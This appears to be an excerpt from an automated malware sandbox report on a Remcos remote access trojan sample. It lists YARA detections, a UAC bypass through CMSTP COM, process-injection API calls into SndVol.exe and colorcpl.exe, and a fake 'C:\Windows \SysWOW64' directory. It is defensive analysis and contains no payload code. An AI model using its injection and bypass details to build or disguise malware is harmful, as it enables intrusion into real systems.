Source: 0.2.jW3NEKvxH1.exe.2d30000.2.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0.2.jW3NEKvxH1.exe.2d30000.2.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000018.00000002.2475144100.0000000002460000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000018.00000002.2475144100.0000000002460000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000018.00000002.2475144100.0000000002460000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 00000013.00000002.2410456379.0000000002940000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000013.00000002.2410456379.0000000002940000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000013.00000002.2410456379.0000000002940000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 00000000.00000002.2288933657.000000007E7A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: jW3NEKvxH1.exe PID: 616, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: SndVol.exe PID: 4576, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: SndVol.exe PID: 3648, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: colorcpl.exe PID: 2680, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Code function: 0_2_02D48730 NtQueueApcThread, 0_2_02D48730
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Code function: 0_2_02D47A2C NtAllocateVirtualMemory, 0_2_02D47A2C
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Code function: 0_2_02D4DC8C RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose, 0_2_02D4DC8C
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Code function: 0_2_02D4DC04 RtlI,RtlDosPathNameToNtPathName_U,NtDeleteFile, 0_2_02D4DC04
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Code function: 0_2_02D4DD70 RtlDosPathNameToNtPathName_U,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose, 0_2_02D4DD70
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Code function: 0_2_02D47D78 NtWriteVirtualMemory, 0_2_02D47D78
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Code function: 0_2_02D48D70 GetThreadContext,SetThreadContext,NtResumeThread, 0_2_02D48D70
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Code function: 0_2_02D48D6E GetThreadContext,SetThreadContext,NtResumeThread, 0_2_02D48D6E
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Code function: 0_2_02D47A2A NtAllocateVirtualMemory, 0_2_02D47A2A
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Code function: 0_2_02D4DBB0 RtlI,RtlDosPathNameToNtPathName_U,NtDeleteFile, 0_2_02D4DBB0
Source: C:\Users\Public\alpha.pif Code function: 9_2_00E464CA NtQueryInformationToken, 9_2_00E464CA
Source: C:\Users\Public\alpha.pif Code function: 9_2_00E57460 EnterCriticalSection,LeaveCriticalSection,fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer, 9_2_00E57460
Source: C:\Users\Public\alpha.pif Code function: 9_2_00E44823 NtQueryVolumeInformationFile,GetFileInformationByHandleEx, 9_2_00E44823
Source: C:\Users\Public\alpha.pif Code function: 9_2_00E4643A NtOpenThreadToken,NtOpenProcessToken,NtClose, 9_2_00E4643A
Source: C:\Users\Public\alpha.pif Code function: 9_2_00E5C1FA SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memcpy,memcpy,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW, 9_2_00E5C1FA
Source: C:\Users\Public\alpha.pif Code function: 9_2_00E5A135 NtSetInformationFile, 9_2_00E5A135
Source: C:\Users\Public\alpha.pif Code function: 9_2_00E46500 NtQueryInformationToken,NtQueryInformationToken, 9_2_00E46500
Source: C:\Users\Public\alpha.pif Code function: 9_2_00E34E3B _setjmp3,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,longjmp, 9_2_00E34E3B
Source: C:\Users\Public\alpha.pif Code function: 9_2_00E44759 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,DeleteFileW,GetLastError, 9_2_00E44759
Source: C:\Users\Public\alpha.pif Code function: 11_2_00E464CA NtQueryInformationToken, 11_2_00E464CA
Source: C:\Users\Public\alpha.pif Code function: 11_2_00E57460 EnterCriticalSection,LeaveCriticalSection,fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer, 11_2_00E57460
Source: C:\Users\Public\alpha.pif Code function: 11_2_00E44823 NtQueryVolumeInformationFile,GetFileInformationByHandleEx, 11_2_00E44823
Source: C:\Users\Public\alpha.pif Code function: 11_2_00E4643A NtOpenThreadToken,NtOpenProcessToken,NtClose, 11_2_00E4643A
Source: C:\Users\Public\alpha.pif Code function: 11_2_00E5C1FA SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memcpy,memcpy,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW, 11_2_00E5C1FA
Source: C:\Users\Public\alpha.pif Code function: 11_2_00E5A135 NtSetInformationFile, 11_2_00E5A135
Source: C:\Users\Public\alpha.pif Code function: 11_2_00E46500 NtQueryInformationToken,NtQueryInformationToken, 11_2_00E46500
Source: C:\Users\Public\alpha.pif Code function: 11_2_00E34E3B _setjmp3,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,longjmp, 11_2_00E34E3B
Source: C:\Users\Public\alpha.pif Code function: 11_2_00E44759 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,DeleteFileW,GetLastError, 11_2_00E44759
Source: C:\Users\Public\Libraries\Dlaybpxl.PIF Code function: 15_2_02E38730 NtQueueApcThread, 15_2_02E38730
Source: C:\Users\Public\Libraries\Dlaybpxl.PIF Code function: 15_2_02E37A2C NtAllocateVirtualMemory, 15_2_02E37A2C
Source: C:\Users\Public\Libraries\Dlaybpxl.PIF Code function: 15_2_02E3DD70 RtlDosPathNameToNtPathName_U,NtOpenFile,NtReadFile,NtClose, 15_2_02E3DD70
Source: C:\Users\Public\Libraries\Dlaybpxl.PIF Code function: 15_2_02E37D78 NtWriteVirtualMemory, 15_2_02E37D78
Source: C:\Users\Public\Libraries\Dlaybpxl.PIF Code function: 15_2_02E37AC9 NtAllocateVirtualMemory, 15_2_02E37AC9
Source: C:\Users\Public\Libraries\Dlaybpxl.PIF Code function: 15_2_02E37A2A NtAllocateVirtualMemory, 15_2_02E37A2A
Source: C:\Users\Public\Libraries\Dlaybpxl.PIF Code function: 15_2_02E3DBB0 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile, 15_2_02E3DBB0
Source: C:\Users\Public\Libraries\Dlaybpxl.PIF Code function: 15_2_02E3DC8C RtlDosPathNameToNtPathName_U,NtWriteFile,NtClose, 15_2_02E3DC8C
Source: C:\Users\Public\Libraries\Dlaybpxl.PIF Code function: 15_2_02E3DC04 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile, 15_2_02E3DC04
Source: C:\Users\Public\Libraries\Dlaybpxl.PIF Code function: 15_2_02E38D6E GetThreadContext,SetThreadContext,NtResumeThread, 15_2_02E38D6E
Source: C:\Users\Public\Libraries\Dlaybpxl.PIF Code function: 15_2_02E38D70 GetThreadContext,SetThreadContext,NtResumeThread, 15_2_02E38D70
Source: C:\Users\Public\alpha.pif Code function: 9_2_00E34C10: memset,GetFileSecurityW,GetSecurityDescriptorOwner,??_V@YAXPAX@Z,memset,CreateFileW,DeviceIoControl,memcpy,CloseHandle,??_V@YAXPAX@Z,memset,??_V@YAXPAX@Z,FindClose,??_V@YAXPAX@Z, 9_2_00E34C10
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Code function: 0_2_02D48788 CreateProcessAsUserW, 0_2_02D48788
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 6_2_029358B9 ExitWindowsEx,LoadLibraryA,GetProcAddress, 6_2_029358B9
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 19_2_029558B9 ExitWindowsEx,LoadLibraryA,GetProcAddress, 19_2_029558B9
Source: C:\Users\Public\alpha.pif File created: C:\Windows 
Source: C:\Users\Public\alpha.pif File created: C:\Windows \SysWOW64
Source: C:\Users\Public\alpha.pif File deleted: C:\Windows \SysWOW64
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Code function: 0_2_02DF43CB 0_2_02DF43CB
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Code function: 0_2_02DF83B0 0_2_02DF83B0
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Code function: 0_2_02D320C4 0_2_02D320C4
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Code function: 0_2_02DF419C 0_2_02DF419C
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Code function: 0_2_02DEE6E0 0_2_02DEE6E0
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Code function: 0_2_02DD4601 0_2_02DD4601
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Code function: 0_2_02DF4628 0_2_02DF4628
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Code function: 0_2_02DCA4D5 0_2_02DCA4D5
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Code function: 0_2_02E0A490 0_2_02E0A490
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Code function: 0_2_02DDE403 0_2_02DDE403
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Code function: 0_2_02DDE53D 0_2_02DDE53D
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Code function: 0_2_02D3C9DF 0_2_02D3C9DF
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Code function: 0_2_02D3C98F 0_2_02D3C98F
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Code function: 0_2_02DE8907 0_2_02DE8907
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Code function: 0_2_02E09662 0_2_02E09662
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Code function: 0_2_02DDD7E4 0_2_02DDD7E4
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Code function: 0_2_02DED73A 0_2_02DED73A
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Code function: 0_2_02DD5B6F 0_2_02DD5B6F
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Code function: 0_2_02DE9FD9 0_2_02DE9FD9
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Code function: 0_2_02DF3F6D 0_2_02DF3F6D
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Code function: 0_2_02E03CC9 0_2_02E03CC9
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Code function: 0_2_02D8BCF4 0_2_02D8BCF4
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Code function: 0_2_02DDDD5B 0_2_02DDDD5B
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 6_2_02946254 6_2_02946254
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 6_2_02951377 6_2_02951377
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 6_2_0295D098 6_2_0295D098
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 6_2_029720D2 6_2_029720D2
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 6_2_0293D071 6_2_0293D071
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 6_2_029561AA 6_2_029561AA
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 6_2_02957150 6_2_02957150
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 6_2_029467CB 6_2_029467CB
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 6_2_0296C739 6_2_0296C739
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 6_2_0293E5DF 6_2_0293E5DF
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 6_2_02952A49 6_2_02952A49
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 6_2_0295C9DD 6_2_0295C9DD
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 6_2_0295CE3B 6_2_0295CE3B
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 6_2_02960E20 6_2_02960E20
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 6_2_02946E73 6_2_02946E73
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 6_2_02946FAD 6_2_02946FAD
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 6_2_02972F00 6_2_02972F00
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 6_2_02932F45 6_2_02932F45
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 6_2_0295CC0C 6_2_0295CC0C
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 6_2_02954D22 6_2_02954D22
Source: C:\Users\Public\alpha.pif Code function: 9_2_00E374B1 9_2_00E374B1
Source: C:\Users\Public\alpha.pif Code function: 9_2_00E44875 9_2_00E44875
Source: C:\Users\Public\alpha.pif Code function: 9_2_00E3540A 9_2_00E3540A
Source: C:\Users\Public\alpha.pif Code function: 9_2_00E34C10 9_2_00E34C10
Source: C:\Users\Public\alpha.pif Code function: 9_2_00E54191 9_2_00E54191
Source: C:\Users\Public\alpha.pif Code function: 9_2_00E39144 9_2_00E39144
Source: C:\Users\Public\alpha.pif Code function: 9_2_00E5695A 9_2_00E5695A
Source: C:\Users\Public\alpha.pif Code function: 9_2_00E44EC1 9_2_00E44EC1
Source: C:\Users\Public\alpha.pif Code function: 9_2_00E43EB3 9_2_00E43EB3
Source: C:\Users\Public\alpha.pif Code function: 9_2_00E45A86 9_2_00E45A86
Source: C:\Users\Public\alpha.pif Code function: 9_2_00E5769E 9_2_00E5769E
Source: C:\Users\Public\alpha.pif Code function: 9_2_00E53E66 9_2_00E53E66
Source: C:\Users\Public\alpha.pif Code function: 9_2_00E3D660 9_2_00E3D660
Source: C:\Users\Public\alpha.pif Code function: 9_2_00E36E57 9_2_00E36E57
Source: C:\Users\Public\alpha.pif Code function: 9_2_00E37A34 9_2_00E37A34
Source: C:\Users\Public\alpha.pif Code function: 9_2_00E3EE03 9_2_00E3EE03
Source: C:\Users\Public\alpha.pif Code function: 9_2_00E40BF0 9_2_00E40BF0
Source: C:\Users\Public\alpha.pif Code function: 9_2_00E40740 9_2_00E40740
Source: C:\Users\Public\alpha.pif Code function: 9_2_00E36B20 9_2_00E36B20
Source: C:\Users\Public\alpha.pif Code function: 11_2_00E374B1 11_2_00E374B1
Source: C:\Users\Public\alpha.pif Code function: 11_2_00E44875 11_2_00E44875
Source: C:\Users\Public\alpha.pif Code function: 11_2_00E3540A 11_2_00E3540A
Source: C:\Users\Public\alpha.pif Code function: 11_2_00E34C10 11_2_00E34C10
Source: C:\Users\Public\alpha.pif Code function: 11_2_00E54191 11_2_00E54191
Source: C:\Users\Public\alpha.pif Code function: 11_2_00E39144 11_2_00E39144
Source: C:\Users\Public\alpha.pif Code function: 11_2_00E5695A 11_2_00E5695A
Source: C:\Users\Public\alpha.pif Code function: 11_2_00E44EC1 11_2_00E44EC1
Source: C:\Users\Public\alpha.pif Code function: 11_2_00E43EB3 11_2_00E43EB3
Source: C:\Users\Public\alpha.pif Code function: 11_2_00E45A86 11_2_00E45A86
Source: C:\Users\Public\alpha.pif Code function: 11_2_00E5769E 11_2_00E5769E
Source: C:\Users\Public\alpha.pif Code function: 11_2_00E53E66 11_2_00E53E66
Source: C:\Users\Public\alpha.pif Code function: 11_2_00E3D660 11_2_00E3D660
Source: C:\Users\Public\alpha.pif Code function: 11_2_00E36E57 11_2_00E36E57
Source: C:\Users\Public\alpha.pif Code function: 11_2_00E37A34 11_2_00E37A34
Source: C:\Users\Public\alpha.pif Code function: 11_2_00E3EE03 11_2_00E3EE03
Source: C:\Users\Public\alpha.pif Code function: 11_2_00E40BF0 11_2_00E40BF0
Source: C:\Users\Public\alpha.pif Code function: 11_2_00E40740 11_2_00E40740
Source: C:\Users\Public\alpha.pif Code function: 11_2_00E36B20 11_2_00E36B20
Source: C:\Users\Public\xpha.pif Code function: 12_2_00841E26 12_2_00841E26
Source: C:\Users\Public\Libraries\Dlaybpxl.PIF Code function: 15_2_02E220C4 15_2_02E220C4
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 19_2_02966254 19_2_02966254
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 19_2_02971377 19_2_02971377
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 19_2_0297D098 19_2_0297D098
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 19_2_029920D2 19_2_029920D2
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 19_2_0295D071 19_2_0295D071
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 19_2_029761AA 19_2_029761AA
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 19_2_02977150 19_2_02977150
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 19_2_029667CB 19_2_029667CB
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 19_2_0298C739 19_2_0298C739
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 19_2_0295E5DF 19_2_0295E5DF
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 19_2_02972A49 19_2_02972A49
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 19_2_0297C9DD 19_2_0297C9DD
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 19_2_0297CE3B 19_2_0297CE3B
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 19_2_02980E20 19_2_02980E20
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 19_2_02966E73 19_2_02966E73
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 19_2_02966FAD 19_2_02966FAD
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 19_2_02992F00 19_2_02992F00
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 19_2_02952F45 19_2_02952F45
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 19_2_0297CC0C 19_2_0297CC0C
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 19_2_02974D22 19_2_02974D22
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Code function: String function: 02D489D0 appears 45 times
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Code function: String function: 02DB9677 appears 38 times
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Code function: String function: 02D344DC appears 74 times
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Code function: String function: 02D4894C appears 56 times
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Code function: String function: 02DEB540 appears 46 times
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Code function: String function: 02D34860 appears 949 times
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Code function: String function: 02D34500 appears 33 times
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Code function: String function: 02D346D4 appears 244 times
Source: C:\Windows\SysWOW64\SndVol.exe Code function: String function: 02953FB0 appears 55 times
Source: C:\Windows\SysWOW64\SndVol.exe Code function: String function: 02973FB0 appears 55 times
Source: C:\Windows\SysWOW64\SndVol.exe Code function: String function: 029220E7 appears 41 times
Source: C:\Windows\SysWOW64\SndVol.exe Code function: String function: 02921F66 appears 49 times
Source: C:\Windows\SysWOW64\SndVol.exe Code function: String function: 029538A5 appears 41 times
Source: C:\Windows\SysWOW64\SndVol.exe Code function: String function: 029420E7 appears 39 times
Source: C:\Windows\SysWOW64\SndVol.exe Code function: String function: 029738A5 appears 41 times
Source: C:\Windows\SysWOW64\SndVol.exe Code function: String function: 02941F66 appears 49 times
Source: C:\Users\Public\Libraries\Dlaybpxl.PIF Code function: String function: 02E24860 appears 683 times
Source: C:\Users\Public\Libraries\Dlaybpxl.PIF Code function: String function: 02E3894C appears 50 times
Source: C:\Users\Public\Libraries\Dlaybpxl.PIF Code function: String function: 02E246D4 appears 155 times
Source: jW3NEKvxH1.exe Binary or memory string: OriginalFilename vs jW3NEKvxH1.exe
Source: jW3NEKvxH1.exe, 00000000.00000003.2145769596.000000007FC9F000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameeasinvoker.exej% vs jW3NEKvxH1.exe
Source: jW3NEKvxH1.exe, 00000000.00000002.2290920143.000000007EE5E000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameeasinvoker.exej% vs jW3NEKvxH1.exe
Source: jW3NEKvxH1.exe, 00000000.00000002.2290920143.000000007EE5E000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameTruesight4 vs jW3NEKvxH1.exe
Source: jW3NEKvxH1.exe, 00000000.00000002.2280895111.0000000020A86000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameeasinvoker.exej% vs jW3NEKvxH1.exe
Source: jW3NEKvxH1.exe, 00000000.00000002.2280895111.0000000020A6E000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameeasinvoker.exej% vs jW3NEKvxH1.exe
Source: jW3NEKvxH1.exe, 00000000.00000003.2228181025.000000007F040000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameeasinvoker.exej% vs jW3NEKvxH1.exe
Source: jW3NEKvxH1.exe, 00000000.00000003.2228181025.000000007F040000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameTruesight4 vs jW3NEKvxH1.exe
Source: jW3NEKvxH1.exe, 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameeasinvoker.exej% vs jW3NEKvxH1.exe
Source: jW3NEKvxH1.exe, 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameLOADER.EXEB vs jW3NEKvxH1.exe
Source: jW3NEKvxH1.exe, 00000000.00000003.2227877290.000000007EA50000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameeasinvoker.exej% vs jW3NEKvxH1.exe
Source: jW3NEKvxH1.exe, 00000000.00000003.2227877290.000000007EA50000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameTruesight4 vs jW3NEKvxH1.exe
Source: jW3NEKvxH1.exe, 00000000.00000003.2145952303.0000000002856000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameLOADER.EXEB vs jW3NEKvxH1.exe
Source: jW3NEKvxH1.exe, 00000000.00000003.2249226014.0000000021B82000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameeasinvoker.exej% vs jW3NEKvxH1.exe
Source: jW3NEKvxH1.exe, 00000000.00000002.2293566287.000000007FAB0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameLOADER.EXEB vs jW3NEKvxH1.exe
Source: jW3NEKvxH1.exe, 00000000.00000002.2266110150.00000000023B5000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameeasinvoker.exej% vs jW3NEKvxH1.exe
Source: jW3NEKvxH1.exe, 00000000.00000003.2145952303.0000000002852000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameeasinvoker.exej% vs jW3NEKvxH1.exe
Source: jW3NEKvxH1.exe, 00000000.00000002.2266672340.0000000002854000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameLOADER.EXEB vs jW3NEKvxH1.exe
Source: jW3NEKvxH1.exe, 00000000.00000002.2266672340.0000000002850000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameeasinvoker.exej% vs jW3NEKvxH1.exe
Source: jW3NEKvxH1.exe, 00000000.00000003.2249226014.0000000021B53000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameeasinvoker.exej% vs jW3NEKvxH1.exe
Source: jW3NEKvxH1.exe, 00000000.00000003.2146235666.000000007F96F000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameeasinvoker.exej% vs jW3NEKvxH1.exe
Source: jW3NEKvxH1.exe, 00000000.00000003.2146235666.000000007F96F000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameLOADER.EXEB vs jW3NEKvxH1.exe
Source: jW3NEKvxH1.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Source: 19.2.SndVol.exe.2940000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 19.2.SndVol.exe.2940000.0.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 19.2.SndVol.exe.2940000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 24.2.colorcpl.exe.2460000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 24.2.colorcpl.exe.2460000.0.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 24.2.colorcpl.exe.2460000.0.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 24.2.colorcpl.exe.2460000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
